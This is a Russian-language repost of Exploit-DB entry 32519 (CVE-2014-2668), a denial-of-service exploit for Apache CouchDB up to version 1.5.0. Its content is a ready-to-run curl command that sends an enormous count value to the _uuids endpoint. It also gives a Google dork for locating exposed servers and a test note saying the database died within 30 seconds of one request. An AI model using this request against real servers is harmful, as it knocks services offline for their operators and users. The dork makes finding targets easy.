- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 32519
- Проверка EDB
-
- Пройдено
- Автор
- KRUSTY HACK
- Тип уязвимости
- DOS
- Платформа
- MULTIPLE
- CVE
- cve-2014-2668
- Дата публикации
- 2014-03-26
Код:
# Exploit Title: Couchdb uuids DOS exploit
# Google Dork inurl: _uuids
# Date: 03/24/2014
# Exploit Author: KrustyHack
# Vendor Homepage: http://couchdb.apache.org/
# Software Link: http://couchdb.apache.org/
# Version: up to 1.5.0
# Tested on: Linux Couchdb up to 1.5.0
HOW TO
======
curl http://couchdb_target/_uuids?count=99999999999999999999999999999999999999999999999999999999999999999999999
TEST
====
Tested on a 16G RAM Quadcore server. Couchdb dead on 30 seconds with only one GET request.
- Источник
- www.exploit-db.com